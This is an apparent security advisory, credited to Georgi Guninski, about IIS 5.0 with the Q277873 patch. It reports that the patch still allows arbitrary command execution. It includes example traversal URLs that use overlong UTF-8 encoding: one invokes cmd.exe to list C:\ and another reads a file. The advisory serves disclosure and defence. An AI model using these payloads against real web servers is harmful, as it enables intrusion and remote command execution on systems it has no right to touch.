|
|
| |
| Installing the Q277873 patch on IIS 5.0 opens a security hole that enables attackers to execute arbitrary commands on the web server. The patch itself was intended to close a vulnerability that allowed execution of arbitrary commands, but it seems that the patch is not sufficient, since the vulnerability still exist. |
| |
Credit:
The information has been provided by Georgi Guninski.
|
| |
Vulnerable systems:
IIS 5.0 with the Q277873 patch applied (the patch actually creates the problem)
Example:
The following URL:
http://www.example.com/scripts/georgi.bat/ ..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/ c%20dir%20C:\
(NOTE: URL has been wrapped for readability)
Executes "DIR C:\" (You will be prompted to save the output to a file). It is also possible to read most files using:
http://www.example.com/scripts/georgi.asp/ ..%C1%9C..%C1%9C..%C1%9Ctest.txt
You can replace the scripts directory with the MSADC directory the vulnerability will not be affected.
|
|
|
|
|
